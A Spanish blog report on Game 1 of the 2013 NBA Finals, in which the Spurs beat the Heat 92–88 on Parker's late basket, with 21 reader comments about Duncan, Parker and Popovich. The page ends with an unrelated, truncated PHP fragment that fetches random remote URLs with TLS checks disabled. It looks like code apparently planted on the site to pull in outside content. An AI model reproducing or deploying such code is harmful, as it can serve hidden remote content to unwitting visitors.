La Crónica: Un partido en una décima de segundo

07 de June de 2013 por MagicJohnson32

tpSe giró Tony Parker, aparentemente calmado, ajeno a las circunstancias, al reloj de posesión que le gritaba que apenas disponía de unas décimas de segundo para lanzar, y al marcador del partido, 90-88 favorable a los Spurs a 5 segundos para la conclusión del primer partido de las Finales de la NBA. Se giró Parker, e inmediatamente saltó hacia adelante para evitar la defensa de LeBron James, que llegó a acariciar la pelota con las puntas de los dedos antes de que el base francés lanzase a tabla, como le ha enseñado Tim Duncan. Tras besar el tablero y el aro, la pelota entró, y no hubo quien no necesitase el instant replay para reconocer dos puntos que valen un partido, y quién sabe si un anillo. Las repeticiones certificaron la validez del lanzamiento de Parker por apenas una décima de segundo, una décima en la que quedó encerrado todo un partido (92-88).

Esa acción sirvió para decantar definitivamente una balanza que, poco a poco, se fue inclinando hacia el lado de los Spurs tras un arranque superior por parte de los Heat. Como ya sucediera en el séptimo contra los Pacers, Miami salió dispuesto a imponer su agresividad y decidido a dar carrete a Wade y Bosh. Mientras Tim Duncan fallaba sus primeros cinco lanzamientos, Parker era el encargado de sostener el fuerte texano ante las embestidas locales. Hubo dos momentos críticos para los Spurs en el segundo cuarto (29-38 y 38-46), desactivados en ambos casos por la aparición de Duncan, que empezó justo a tiempo un nuevo clinic de baloncesto.

A partir del descanso, al que se llegó con 49-52 para los Heat, las tornas fueron cambiando. Tal vez fue el cansancio acumulado en la serie contra Indiana o tal vez los ajustes de Popovich en el vestuario, en cualquier caso, los Heat fueron perdiendo el dominio del partido. En el tercer cuarto, ambos equipos empezaron a tener más problemas para anotar cerca del aro. Los Spurs desaprovecharon la ocasión de ponerse por delante al fallar varios triples cómodos pero llegaron al último período en la situación que querían (69-72), en condiciones de rematar la faena en los últimos 12 minutos. En el tramo final Wade y Bosh regresaron a la cruda realidad que sus actuales estados físicos y mentales les impone. A Wade se le ve desnaturalizado, incómodo salvo en acciones en transición, mientras Bosh se empeña en dejar alguna huella a base de triples. Así, con la figura de Tim Duncan cada vez más agigantada, los Spurs se pusieron por delante de forma definitiva a 7 minutos para el final (79-78). El ataque de los Heat se secó: tres pérdidas, varios triples errados y una propuesta muy plana, frente a la sobriedad de los Spurs, que permanecieron fieles a sí mismos y así encontraron un triple de Danny Green para irse 8 arriba (88-81).

Todavía les quedaba a los Heat un intento de réplica. 5 puntos de LeBron (tal vez menos anotador de lo que su equipo necesitaba anoche) y 3 tiros libres de Ray Allen dejaron el marcador 90-88 a 0:31 para el final antes de que Tony Parker anotase su milagrosa canasta que pasa a formar parte, desde ya, del imaginario colectivo de las Finales de la NBA.

lebron duncanPREMIOS

MVP: Tony Parker anotó 21 puntos en total, 10 en el último cuarto y una canasta imposible a 5 segundos para el final que selló la victoria para los suyos, pero el verdadero MVP del partido fue el gran Tim Duncan. Superó un mal inicio de partido y acabó con 20 puntos, 14 rebotes, 4 asistencias y 3 tapones. Sólo Kareem Abdul-Jabbar consiguió estos números con más edad.

Sorpresa: Ray Allen tiró 4 triples y anotó 3. Además, en el último cuarto acertó 4 de los 5 tiros libres de los que dispuso. Ya firmaría por tener cada día actuaciones así.

Decepción: Seguimos atizando a Dwyane Wade y Chris Bosh. Entre ambos anotaron tan solo 2 puntos en el último cuarto con un 1 de 7 en tiros de campo.

Esfuerzo en vano: Con 18 puntos, 18 rebotes y 10 asistencias, LeBron James consiguió su tercer triple-doble en unas finales y se convirtió en el 2º jugador con más triples-dobles tras Magic Johnson. No sabemos si el dato le sirve de algún consuelo.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. AntoniAngel dice:
    #1

    Merece la pena perder horas de sueño por ver cómo un par de abueletes vuelven a dar un clínic de baloncesto. Hoy, pese a todo, preferiria tenir libre media horita para tirar unas canastas antes que para una siesta…

      Citar

  2. dunc dice:
    #2

    Gran crónica.

    Para los que visteis el partido, ¿quien se ocupó de la defensa de Lebron? ¿le defendieron bien? ¿defendieron bien el pick&roll los spurs? ¿se puso Lebron sobre Parker durante mucho tiempo?

    Gracias

      Citar

  3. rumbero dice:
    #3

    Preguntaba kantonyo como habían ganado los Spurs viendo las estadísticas del partido…pues porque estos tios compiten como nadie. En la primera parte se jugó como quería Miami, a campo abierto con muchas transiciones rápidas, fallaron tiros relativamente fáciles y aun así solo se fueron 3 abajo (con canastón de Timmy faltando 0.8 como quien pasa por ahí sin que vaya con él la cosa). En el descanso fijo que hubo bronca de Pop, y como dice Magic, entre el cansancio que se preveia que podía pesar en los jugadores de Miami y los ajustes defensivos de San Antonio se empezó a jugar como querian estos últimos. Impagable la labor de Leonard, que no metió ni una estando solo y abierto pero que dejó a Lebron (gracias a las ayudas de los copis también) en 6 puntos en la segunda mitad, porque por mucho que ayer se dedicara más a distribuir la verdad es que no lo tuvo nada fácil a la hora de encarar a canasta o cuando posteaba.
    Y todo esto está muy bien pero luego hay que rendirse a Duncan y Parker porque sino no ganan el partido. Un escándalo de partido de los dos. 37 tacos e Duncan y empezó con 0/5 y dos faltas y luego va y se casca un recital de baloncesto para gravarlo. Y cuando no se agarraban a él ahí estaba Parker que hizo un último cuarto monumental con esa guinda final. 0 pérdidas tuvo además. Partidazo de los grandes

      Citar

  4. pcerezo dice:
    #4

    Eternos. Estos tíos son eternos. Se deberían retirar juntos (ya sé que Parker es más joven) pero es que no se entiende a Parker sin Dunca ni Ginobili y dos veces viceversa.

      Citar

  5. pablo dice:
    #5

    No puede dormir la siesta en los ultimos segundos miami y dejar pasar la victoria en este primer partido..pero bueno igual vamos miami que podemos.

      Citar

  6. HisRoyalAirness dice:
    #6

    Aaaaaay, lo acabo de ver y qué contento estoy…

    dunc, la defensa de Lebron fue casi todo el partido de Kahwi Leonard, alternándose en momentos puntuales con Danny Green; el resto del equipo trataba también de ponerle el cuerpo delante continuamente para que no pudiese arracar. Gran defensa de equipo echándose encima de él cuando intentaba penetrar.

    Lebron sólo se puso sobre Parker al final del partido y no fue nada reseñable.

    Muy serio Splitter, por cierto.

    Y de Duncan no hablo que se me saltan las lágrimas. Intentaron hacer la ayudita casera de todos los días pitándole la primera falta en el primer cuarto (que no era) pero se fue a sentar, salió en el segundo y metió 12 puntos. Best power forward ever

      Citar

  7. Lucho dice:
    #7

    “De Duncan no hablo que se me saltan las lágrima”
    Brillante el comentario. Y aun mas brillante Tim
    Emociona

      Citar

  8. Laker1624 dice:
    #8

    Buenas,

    Creo que desde la llegada de Duncan los Spurs se han convertido en uno de los mejores equipos de la historia. Si además consiguen ganar esta final, cosa que veo perfectamente posible, creo que deberían considerarse un Top 5 de los mejores equipos de la historia (si es que no lo son ya). A bote pronto tan solo me atrevo a situar por encima de ellos en un ranking histórico a los Celtics de los 60, los Bulls de los 90, y los Lakers de los 80, y por este orden.

    En cuanto a Duncan, que decir que no se haya dicho ya. Teniendo en cuenta el global de su carrera, yo lo situaría por encima de Kobe y LeBron, aunque me parece que a este último aun le queda mucho por hacer. En mi opinión, la profesionalidad, competitividad y regularidad de Duncan son unas de las principales causas de que los Spurs hayan sido un candidato claro al titulo desde la llegada de Tim a San Antonio prácticamente. Claro que también pienso que influyen muchos mas factores para que tu equipo sea uno de los favoritos al titulo, pero para mi, Duncan es el factor mas importante y determinante a la hora de hacer de San Antonio el equipo campeón que es y que ha sido, y eso creo que muy pocos jugadores lo han logrado hacer durante toda su carrera como lo ha hecho este señor.

      Citar

  9. Lucho dice:
    #9

    Yo entre Duncan y Kobe no me animo a decir quien es mejor. Hace unos años te decia Kobe, pero ahora ya dudo
    Que son los 2 mejores de toda la era post Jordan no hay discusion (año 2013, todavia LBJ no esta a ese nivel. Suponemos que llegará/lo sobrepasará, pero en un futuro)

      Citar

  10. HisRoyalAirness dice:
    #10

    Lucho:
    Yo entre Duncan y Kobe no me animo a decir quien es mejor. Hace unos años te decia Kobe, pero ahora ya dudo
    Que son los 2 mejores de toda la era post Jordan no hay discusion (año 2013, todavia LBJ no esta a ese nivel. Suponemos que llegará/lo sobrepasará, pero en un futuro)

    Yo diría que esos 2 y Shaq

      Citar

  11. Tobal dice:
    #11

    Como bien hablais,qué bueno es Tim Duncan,es un delicia el verle jugar,qué fundamentos tiene y que manita,ojo con estos Spurs,que quieren despedir esta gran trayectoria,con un nuevo anillo,ojalá lo consigan,son una leyenda viva de la NBA.

      Citar

  12. GreenPride dice:
    #12

    Bueno pues ya tenemos aquí a los Spurs. Gran partido para empezar de los texanos donde tiraron de experiencia para mantenerse en el primer tiempo para aprovechar sus oportunidades en la segunda mitad.
    Para empezar Wade&Bosh se metían rapido en el partido y los Heat salían dominando con un LeBron pasador. Se jugaba a lo que quería Miami que no sufría por dentro ni en el rebote y podía anotar en transición. Hasta les funcionaban los lanzadores anotando triples con facilidad.
    Sin embargo los dos amagos de abrir una ventaja importante fueron cortados de raíz por la experiencia y saber hacer de Duncan. Importantísima la actuación de TD en el segundo cuarto manteniendo a los suyos cerca.
    Y como decís poco a poco en el segundo tiempo la balanza empezó a caer del lado Spur. Primero pararon las transiciones de los Heat, luego cerraron el grifo a Wade&Bosh y si no abrieron ventaja antes fue porque Leonard y Green no estuvieron acertados con los lanzamientos abiertos. Al final una mini-racha les puso arriba de 8 y supieron aguantar el último tirón de LeBron para llevarse la victoria con la última genialidad de Parker.
    Los Heat ya han visto que se enfrentan a un equipo que les puede hacer frente a correr y que cuando se baja el ritmo les puede matar gracias a su gran ejecución en 5×5. Los Spurs no pierden balones y Parker les va a dar muchos dolores de cabeza a sus defensores.
    Ahora las Finales se ponen al rojo con Miami desesperado para conseguir una victoria en el segundo partido y los Spurs con el cuchillo para intentar rematar con otra victoria. Es de esperar un LeBron mucho más anotador en el segundo partido pero con Wade&Bosh a este nivel no me cansaré de decir que no podrá ganar él sólo. Veremos cómo salen estos dos para el segundo partido y si pueden restablecer el juego que más les interesa si no quieren ver cómo los Spurs les matan por la vía rápida. Queremos final así que esperemos que sea larga…

      Citar

  13. HisRoyalAirness dice:
    #13

    Es que el segundo cuarto de Timmy es para ponérselo en video a cualquier niño que quiera coger un balón de baloncesto. Hasta ese momento no había jugadas para él, tiraba de vez en cuando pero eran posesiones no muy buenas ya que el peso ofensivo lo llevaba Parker. Llegó un momento que era balón en el poste bajo y puntos o falta y sueltan los de la retransmisión yanki: “the Birdman is coming in to try to stop de bleeding!!”. Por supuesto me dio un ataque de risa épico y las dos siguientes jugadas fueron 4 puntos de Duncan y 2 faltas del pajarraco

      Citar

  14. MagicJohnson32 dice:
    #14

    Soy muy fan de Duncan y lo considero el mejor PF de la historia con cierto margen, pero en los reconocimientos por los méritos de los Spurs hay que incluir a Popovich y a RC Buford. Sin ellos, sin su labor desde el banquillo y los despachos, no hay manera de entender la reconversión de este equipo, que le ha permitido alargar su fecha de caducidad 3-4 temporadas más de lo que todos pensábamos.

      Citar

  15. Lucho dice:
    #15

    Si adhiero. Y tienen mas merito todavia, no lo olvidemos, en draftear a Ginobili y Parker

      Citar

  16. Denise dice:
    #16

    Lucho:
    Si adhiero. Y tienen mas merito todavia, no lo olvidemos, en draftear a Ginobili y Parker

    Con Luis Scola la cagaron.

      Citar

  17. Denise dice:
    #17

    Denise: Con Luis Scola la cagaron.

    La cagaron traspasandolo quiero decir…, en un momento ademas en el que ya dominaba en Europa, año 2007.

      Citar

  18. jose_dantley dice:
    #18

    MagicJohnson32:
    Soy muy fan de Duncan y lo considero el mejor PF de la historia con cierto margen, pero en los reconocimientos por los méritos de los Spurs hay que incluir a Popovich y a RC Buford. Sin ellos, sin su labor desde el banquillo y los despachos, no hay manera de entender la reconversión de este equipo, que le ha permitido alargar su fecha de caducidad 3-4 temporadas más de lo que todos pensábamos.

    Cuando hablamos de Popovich en un tono tan positivo -como no puede ser menos-, me acuerdo de Montes, es un mecanismo involuntario que tengo activado. Creo que no hubiera tenido reparos en admitir ya con el paso del tiempo, como muchos de nosotros, que Popovich es uno de los más grandes.

    Lo de Buford roza lo milagroso. Estuve en San Antonio -juro que no lo confundí con San Francisco- hace unos 12 años. No es la ciudad en la que te puedes imaginar que está una de las franquicias deportivas de más éxito del deporte americano. Su downtown no impresionada nada, tiene un río domesticado para hacer un paseo agradable con sus bares, restaurantes y tiendas, tiene el Álamo que está muy sobrevalorado, pero nada que no te encuentres en docenas de ciudades. Resumiendo, no hay potencial de grandeza en San Antonio. Durar tantísimo tiempo, tan arriba tiene mérito si fueras el GM de una ciudad como Nueva York, Los Angeles o Chicago. Hacerlo en San Antonio pasa a situarte en lo más alto de la gestión deportiva de todos los tiempos.

      Citar

  19. Sancho88 dice:
    #19

    Buena anécdota Jose.

    Yo lo que vi en el partido fueron muchas de las cosas que estáis diciendo. Sobre todo, la riqueza táctica de Popovich y la insuficiencia de MIami para atajar al ataque Spur. A pesar del tanteador bajo, Spurs dieron un recital ofensivo, y no ganaron de paliza, de 10 o 20, porque no les entraron muchos de sus triples. Si no, nos habríamos quedado sin partido en el tercer cuarto. Una vez más, en los momentos finales el equipo defiende mejor y ataca con las ideas más claras. Ahí Miami sufrió como Memphis, y eso no debería ocurrir en un equipo con Lebron, Wade y Bosh. Seguramente algún mérito sea de Popovich… y de Buford como dice Jose. Decían en la retransmisión del plus que Popo estuvo reticente a draftear a Parker en su día porque le veía un poco blandengues en defensa, y Buford lo convenció. Pero bueno, esas intrahistorias de los fichajes solo salen a la luz a veces como anécdotas graciosas. Seguro que si no lo hubieran drafteado nadie habría contado esa anécdota.

    En lo deportivo en sí, creo que estamos loando mucho a Timmy y Tony, pero para mí, quien fue indefendible el jueves fue Manu Ginobili. Una vez más parar a este hombre es muy complicado, sobre todo porque si centras tus esfuerzos en parar el pick&roll, dejas a Manu deficientemente defendido por Allen (este hombre está fatal en defensa, a pesar de sus triples en ataque), y te hace de todo. Triples, saca faltas, divide hacia canasta, te entra por la izquierda, la saca fuera…. su juego me encanta. Siempre me ha parecido un factor X de los Spurs, el jugador especial que siempre lidera la segunda unidad y el rival nunca tiene argumentos defensivos sobre su persona.

    Y después, al margen de Manu, lo que es admirable es las doscientasmil maneras de encontrar a Duncan que aplican los Spurs. Da igual lo que hagas, los 2×1 que intentó Miami, las carreras hasta morir de Chalmers y Nole yendo al tío que tenía el balón. La circulación de Spurs es tan condenadamente rápida que triangulan hasta tres veces por posesión después de haber intentado pick&roll, y Duncan juega en los dos postes, con el small ball de San Antonio surtiéndole, y si Spurs se despistaban, CATAPÚM!!, pase a la esquina y triple de Green, Leonard, Manu o Neal. Osea, como dije al principio, a pesar del bajo tanteador, que se dio sobre todo por la ausencia de pérdidas en ambos bandos, es decir, menos contraataques y canastas fáciles, y más posesiones a 24 segundos, a pesar de ese marcador, el recital ofensivo de los Spurs como grupo es para recordarlo por mucho tiempo.

    Timmy soberbio sobreponiéndose a un inicio de partido nefasto, y Parker bailando a toda la defensa de Miami. Obviamente, Tony Parker es el mejor base del planeta ahora mismo. Negarlo es no ver la evidencia.

    Chapó Popovich, chapó Buford, chapó Spurs. Poco más que decir. Si Duncan consigue su 5 anillo sería de justicia poética. Este equipo se lo merece.

      Citar

  20. L.Casei dice:
    #20

    ¿Pops uno de los más grandes de la Historia?
    Sin duda alguna.

    Por perfil, por carácter, por el trato con los jugadores, por la variedad de los sistemas ofensivos, por la mentalidad competitiva que basa su fortaleza en la defensa, por confiar en un estilo y construir sus equipos en base a él, por el respeto de sus colegas y de la Liga en general, por haber sido un pionero a la hora de confiar en los jugadores no estadounidenses, por su capacidad de identificar y explotar el talento de todos sus jugadores…

    Por supuesto, nada de esto valdría de nada sin una franquicia que confiase ciegamente en él y que le haya mantenido en el puesto pase lo que pase… Pero eso es lo que precisamente se ha ganado. Sólo él sabe cuánto tiempo seguirá entrenando; ojalá sean muchos años más. Es el Ferguson o Guy Roux del baloncesto, el mejor entrenador de baloncesto en activo, sin más.

      Citar

  21. Lucho dice:
    #21

    Totalmente de acuerdo con Popovich = Ferguson
    Es mas, lo he puesto en mi twitter alguna vez

    Excelente analisis de los Spurs en los comentarios. Agregaria un atributo mas: la humildad, tanto sea de Duncan, de Manu como de Parker. Que big three inolvidable

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>